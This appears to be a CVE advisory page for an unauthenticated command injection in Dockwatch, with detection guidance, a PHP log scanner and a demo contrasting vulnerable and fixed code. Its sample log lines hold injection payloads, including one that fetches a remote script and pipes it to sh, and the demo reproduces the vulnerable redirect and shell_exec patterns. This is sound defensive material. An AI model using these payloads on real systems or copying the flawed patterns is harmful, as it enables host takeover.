CVE-2026-58455
Status: Received - Intake

Unauthenticated OS Command Injection in Dockwatch

Vulnerability report for CVE-2026-58455, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-02

Last updated on: 2026-07-02

Assigner: VulnCheck

Description

Dockwatch through 0.6.567 contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands by exploiting a missing exit() after an authentication redirect in loader.php combined with unsanitized input passed to shell_exec() in ajax/compose.php. Attackers can seed the required session flag through the incomplete auth check, then inject arbitrary commands via the composePath POST parameter in the composePull action to achieve full host compromise, facilitated by the standard deployment mounting of the Docker socket.

CVSS Scores

No CVSS vector or score is listed on this page.

EPSS Scores

Probability: not yet evaluated
Percentile: not yet evaluated

Meta Information

Published: 2026-07-02
Last Modified: 2026-07-02
Generated: 2026-07-02
AI Q&A: 2026-07-02
EPSS Evaluated: N/A
External references: NVD, EUVD

Affected Vendors & Products

Currently, no data is known.

Helpful Resources

Exploitability

CWE

CWE-78: The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
CWE-698: The web application sends a redirect to another location, but instead of exiting, it executes additional code.

KEV

No KEV status is shown on this page.

Attack-Flow Graph

AI Quick Actions

Compliance Impact

CVE-2026-58455 is a critical unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands and achieve full host compromise. Such a severe security flaw can lead to unauthorized access, data breaches, and potential manipulation or exfiltration of sensitive information.

Because of the risk of full host compromise and unauthorized data access, this vulnerability can negatively impact compliance with common standards and regulations such as GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

Organizations using affected versions of Dockwatch must address this vulnerability promptly to maintain compliance and avoid penalties related to data protection and security requirements.

Executive Summary

CVE-2026-58455 is a critical unauthenticated OS command injection vulnerability in Dockwatch version 0.6.567 and earlier. It arises because the application fails to exit after an authentication redirect in loader.php, allowing the script to continue running. Additionally, unsanitized user input is passed directly to shell_exec() in ajax/compose.php via the composePath POST parameter during the composePull action.

Attackers can exploit this by setting a required session flag through the incomplete authentication check, then injecting arbitrary shell commands through the composePath parameter. This leads to remote code execution without authentication, potentially resulting in full host compromise, especially since the Docker socket is typically mounted in the standard deployment.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary shell commands on the affected host without any authentication. This can lead to full compromise of the host system where Dockwatch is running.

  • Attackers can gain complete control over the system.
  • They can manipulate or steal sensitive data.
  • They can disrupt services or deploy further malware.
  • The vulnerability is especially dangerous because the standard deployment mounts the Docker socket into the container: whoever can talk to that socket can start a privileged container with the host filesystem mounted, which is equivalent to root on the host rather than control of the Dockwatch container alone.
Detection Guidance

This vulnerability can be detected by monitoring for unusual or unauthorized POST requests to ajax/compose.php, specifically those using the composePull action with a composePath parameter that contains shell metacharacters or embedded commands. Note that composePath travels in the POST body, which a default web-server access log does not record: to see it you need request-body logging at the reverse proxy, a WAF in front of the application, or request logging inside the application itself.

Because the incomplete check in loader.php lets an unauthenticated request continue and set the session flag, a second indicator is a session that carries the authenticated flag without a preceding successful login from the same client. Correlate new session IDs against the login endpoint's log; sessions whose only activity is ajax/compose.php are suspect.

Where request bodies are logged, a practical approach is to search for POST requests to ajax/compose.php whose composePath value contains shell metacharacters such as ";", "|", "`" or "$". Remember that form values are URL-encoded in the body, so ";" arrives as %3B, "`" as %60 and "|" as %7C, and that a raw "&" is the parameter separator, so matching it would flag nearly every request.

  • Use command-line tools like grep to search logs: grep -i 'composePull' /var/log/nginx/access.log | grep -iE 'composePath=[^&]*(%3B|%60|%7C|%24|%26|[;`|$])'
  • Monitor running processes or command history for unexpected shell commands spawned by the web-server or PHP worker process, which could have been injected this way.
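
The following scanner is an added example, not code from Dockwatch or from this page. It applies the detection logic above to access-log lines that include the request body, which is an assumption: it expects a custom nginx log_format that appends $request_body to each line, since a stock access log carries no body. The parameter name action is also an assumption (the page names only the composePull action and the composePath parameter), and the four sample lines are constructed.

```php
<?php
// Added example, not Dockwatch's own code. Scans access-log lines for
// composePull requests whose composePath contains shell metacharacters.
// Assumed log format (a custom nginx log_format that appends $request_body;
// a stock access log has no body and would give this script nothing to find):
//   $remote_addr - [$time_local] "$request" $status "$request_body"
// The parameter name 'action' is also an assumption; the page only names the
// composePull action and the composePath parameter.
declare(strict_types=1);

// Characters that let a value break out of the intended command. A raw '&'
// can only appear in a decoded value if it was sent as %26, since '&'
// separates form fields.
const SHELL_META = '/[;&|`$<>\n]/';

// Parse one line of the assumed format. Returns null unless it is a POST to
// ajax/compose.php.
function parseLine(string $line): ?array
{
    $re = '/^(\S+) - \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) "(.*)"$/';
    if (!preg_match($re, rtrim($line, "\r\n"), $m)) {
        return null;
    }
    [, $ip, $time, $method, $path, $status, $body] = $m;
    if ($method !== 'POST' || strpos($path, 'ajax/compose.php') === false) {
        return null;
    }
    // nginx writes '"' and '\' inside logged variables as \x22 and \x5C; undo
    // that first, then parse_str() URL-decodes %3B, %60, %7C and friends.
    $body = preg_replace_callback('/\\\\x([0-9A-Fa-f]{2})/',
        fn(array $h): string => chr((int) hexdec($h[1])), $body);
    parse_str($body, $params);
    return ['ip' => $ip, 'time' => $time, 'status' => (int) $status, 'params' => $params];
}

// A request is suspicious when it is the composePull action and its decoded
// composePath contains any shell metacharacter.
function isSuspicious(array $req): bool
{
    $p = $req['params'];
    return ($p['action'] ?? '') === 'composePull'
        && isset($p['composePath'])
        && preg_match(SHELL_META, (string) $p['composePath']) === 1;
}

// Returns the flagged requests together with their 1-based line numbers.
function scanLog(iterable $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        $req = parseLine($line);
        if ($req !== null && isSuspicious($req)) {
            $hits[] = ['line' => $i + 1] + $req;
        }
    }
    return $hits;
}

// Constructed sample log (RFC 5737 documentation addresses, no real traffic).
$sample = [
    '203.0.113.7 - [02/Jul/2026:10:14:02 +0000] "POST /ajax/compose.php HTTP/1.1" 200 '
        . '"action=composePull&composePath=%2Fcompose%2Fapp%3Bid%3E%2Ftmp%2Fpwned%3B%23"',
    '198.51.100.4 - [02/Jul/2026:10:15:30 +0000] "POST /ajax/compose.php HTTP/1.1" 200 '
        . '"action=composePull&composePath=%2Fcompose%2Fapp%2Fdocker-compose.yml"',
    '198.51.100.4 - [02/Jul/2026:10:15:31 +0000] "GET /index.php HTTP/1.1" 200 "-"',
    '203.0.113.7 - [02/Jul/2026:10:16:00 +0000] "POST /ajax/compose.php HTTP/1.1" 200 '
        . '"action=composePull&composePath=%2Fx%60curl+203.0.113.7%2Fp%7Csh%60"',
];

// Against a real file: scanLog(new SplFileObject('/var/log/nginx/access.log'))
foreach (scanLog($sample) as $hit) {
    printf("line %d  %s  %s  composePath=%s\n",
        $hit['line'], $hit['time'], $hit['ip'], $hit['params']['composePath']);
}
```

The scanner decodes the body before matching, which is the point the grep above can only approximate: an attacker's ";" or "`" is URL-encoded on the wire, so matching on raw characters in the log misses it, and matching on "&" flags the field separator. The second sample line, a legitimate compose path, is left alone.
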
Mitigation Strategies

Immediate mitigation steps include updating Dockwatch to a version that contains the fix for this vulnerability.

The fix has two parts: an exit() call immediately after the authentication redirect in loader.php, so that an unauthenticated request stops there instead of continuing into the action handlers, and escapeshellarg() around the composePath parameter before it reaches shell_exec() in ajax/compose.php. Note that escapeshellarg() only stops the value from breaking out of its argument; it does not stop a caller from pointing the pull command at an arbitrary file on the host, so the handler should also verify that the resolved path lies under the configured compose directory.

If an update is not immediately possible, restrict access to the Dockwatch application, especially the ajax/compose.php endpoint, to trusted users or networks only.

Additionally, because the standard deployment mounts the Docker socket into the container and that mount is what turns command execution into host compromise, run an unpatched instance without the socket, or take it offline, until the fix is applied.
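
The following script is an added illustration, not Dockwatch's own code, of the two defects described in the Executive Summary and the two-part fix described in this section: a redirect without exit() (CWE-698) and an unquoted POST value in a shell command (CWE-78), each beside its hardened form. The session flag name authenticated, the command shape docker compose -f <path> pull, and the $composeRoot directory are assumptions; nothing is passed to shell_exec(), the compose functions return the command line that would have run, so the script can be executed offline with php compose_demo.php.

```php
<?php
// Added illustration, not Dockwatch's own code. It models the two defects this
// page describes (CWE-698 in loader.php, CWE-78 in ajax/compose.php) next to
// the hardened form of each. Nothing here reaches shell_exec(): the compose
// functions return the command line that would have run, so the script can be
// executed offline with:  php compose_demo.php
declare(strict_types=1);

// ---- Defect 1: redirect without exit (CWE-698) ----------------------------
// The flag name 'authenticated' is an assumption; the page only says a
// session flag is seeded by the incomplete check.

// Vulnerable gate: header() queues the redirect, but without exit() the
// script continues, sets the flag, and returns as if the check had passed.
function gateVulnerable(bool $loggedIn, array &$session): bool
{
    if (!$loggedIn) {
        header('Location: /login.php');
        // missing exit(): execution falls through
    }
    $session['authenticated'] = true;   // reachable by an unauthenticated caller
    return true;                        // handler code would run next
}

// Fixed gate: exit() right after the redirect ends the request, so nothing
// below is reachable without a real login.
function gateFixed(bool $loggedIn, array &$session): bool
{
    if (!$loggedIn) {
        header('Location: /login.php');
        exit();
    }
    $session['authenticated'] = true;
    return true;
}

// ---- Defect 2: raw POST value in a shell command (CWE-78) ------------------
// The command shape 'docker compose -f <path> pull' is an assumption.

// Vulnerable: composePath is concatenated unquoted, so a value such as
// "/x; id > /tmp/pwned; #" is parsed by the shell as three commands.
function composePullVulnerable(string $composePath): string
{
    return 'docker compose -f ' . $composePath . ' pull';
}

// Fixed: confine the path to the configured compose directory, then quote
// what reaches the shell. escapeshellarg() alone would still let a caller
// point the command at any file on the host.
function composePullFixed(string $composePath, string $composeRoot): ?string
{
    $real = realpath($composePath);
    $root = realpath($composeRoot);
    if ($real === false || $root === false) {
        return null;                    // path does not exist: reject
    }
    if (strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;                    // resolves outside the root: reject
    }
    return 'docker compose -f ' . escapeshellarg($real) . ' pull';
}

// ---- Demo with a constructed payload -------------------------------------
$payload = '/x; id > /tmp/pwned; #';   // constructed injection string
$root    = sys_get_temp_dir() . '/dockwatch-demo';
if (!is_dir($root)) {
    mkdir($root, 0700, true);
}
touch($root . '/docker-compose.yml');

echo 'vulnerable : ', composePullVulnerable($payload), PHP_EOL;
var_dump(composePullFixed($payload, $root));                       // injection string
var_dump(composePullFixed('/etc/hostname', $root));                // real file outside root
var_dump(composePullFixed($root . '/docker-compose.yml', $root));  // file inside root

$session = [];
var_dump(gateVulnerable(false, $session), $session);   // unauthenticated caller gets through
gateFixed(false, $session);                            // unauthenticated caller stopped by exit()
echo 'unreachable', PHP_EOL;
```

The order of the two checks in composePullFixed() matters: realpath() both rejects the injection string (it names no existing file) and collapses ".." segments, so the prefix comparison is made on the canonical path rather than on whatever the client typed. Quoting is applied last, to the resolved value, so a legitimate path that happens to contain a space or quote still works.
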
